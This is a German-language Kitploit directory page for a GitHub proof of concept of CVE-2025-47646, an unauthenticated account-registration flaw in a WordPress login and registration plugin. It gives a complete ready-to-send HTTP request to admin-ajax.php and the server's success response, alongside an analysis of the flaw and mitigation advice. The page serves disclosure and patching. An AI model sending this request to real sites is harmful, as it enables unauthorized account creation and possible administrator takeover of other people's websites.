Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-47646 — WordPress PSW Front-end Login & Registration Plugin <= 1.12 ist anfällig für Broken Authentication | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-47646
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierungLernen & Bildung
GitHubnxploited/cve-2025-47646

CVE-2025-47646

WordPress PSW Front-end Login & Registration Plugin <= 1.12 ist anfällig für Broken Authentication

Repository anzeigen
21vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🔐 CVE-2025-47646 – PSW Front-End-Login und -Registrierung <= 1.12

📌 Plugin-Informationen

  • Plugin: PSW Front-End-Login und -Registrierung
  • Betroffene Version: <= 1.12
  • CVE: CVE-2025-47646
  • Schweregrad: Hoch (CVSS 9.8)
  • Schwachstellentyp: Gebrochene Authentifizierung
  • Erforderliches Privileg: Nicht authentifiziert
  • Behoben: ❌ Kein offizieller Fix verfügbar
  • Patch-Priorität: 🔴 Hoch
  • Veröffentlicht am: 08. Mai 2025

⚠️ Zusammenfassung der Schwachstelle

Dieses Plugin weist einen kritischen Fehler in seinem Registrierungsmechanismus auf.
Während es ein Shortcode-basiertes Front-End-Registrierungsformular ([psw_registration]) anbietet, werden keine ordnungsgemäßen Rollenbeschränkungen oder sicheren Validierungen durchgesetzt.

Angreifer können diesen Mechanismus ausnutzen, um Konten ohne Authentifizierung zu erstellen – und wenn die default_role der Website falsch konfiguriert ist (z. B. auf administrator gesetzt), kann eine vollständige Privilegieneskalation erfolgen.


🧪 Proof of Concept (PoC)

✅ Ziel-Endpunkt:

root@kitploit:~
POST /wordpress/wp-admin/admin-ajax.php

📥 Anfrage (z.B. über Burp Suite oder curl):

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1

Host: {Host}

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 233

Origin: {Host}

Connection: keep-alive

Cookie:

Priority: u=0



first_name=nxploited&last_name=nxploited&new_user_name=nxpl3432oited&new_user_email=NxploitBot%40gmail.com&new_user_password=admin&new_user_password_confirmation=admin&action=register_user_front_end&psw_form=75a32ef38d

psw_form ist das Nonce-Feld, das für die Anfrage erforderlich ist.
Dieses Nonce wird dynamisch aus dem Shortcode [psw_registration] auf der Frontend-Seite generiert.


✅ Erfolgsantwort

root@kitploit:~
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8

<h4>Hallo nxploited nxploited</h4>
<p>Danke, dass Sie ein Konto auf unserer Website erstellt haben. Bitte überprüfen Sie Ihre E‑Mail auf den Aktivierungslink...</p>

🛠️ Wo liegt der Fehler?

  • Das Plugin erlaubt nicht authentifizierten AJAX-Zugriff auf register_user_front_end
  • Es respektiert die default_role-Einstellung von WordPress, um Benutzerrollen zuzuweisen
  • Wenn diese falsch konfiguriert ist (administrator), erhält der Angreifer vollen Zugriff
  • Es gibt keine fest codierte Rollenüberprüfung oder -validierung in der Plugin-Logik

💬 Erklärung des Shortcodes

Um das Registrierungsformular anzuzeigen und ein gültiges Nonce für psw_form zu generieren, wird folgender Shortcode verwendet:

root@kitploit:~
[psw_registration]

Dieser rendert ein Registrierungsformular, das das versteckte Nonce-Feld enthält, das für den Erfolg des AJAX-Aufrufs erforderlich ist.


🔐 Empfehlung

  • Schränken Sie nicht authentifizierte AJAX-Registrierung ein
  • Erzwingen Sie Rollenzuweisungen serverseitig
  • Überwachen und sperren Sie default_role auf einen sicheren Wert (z. B. subscriber)
  • Wenden Sie virtuelles Patching an, falls kein Update verfügbar ist

⚠️ Haftungsausschluss

Dieser Bericht dient ausschließlich zu Bildungs- und autorisierten Sicherheitstestzwecken.
Die Ausnutzung dieser Schwachstelle ohne Erlaubnis kann rechtliche und ethische Grenzen überschreiten.


NXploited (Khaled_Alenazi)

Tool herunterladen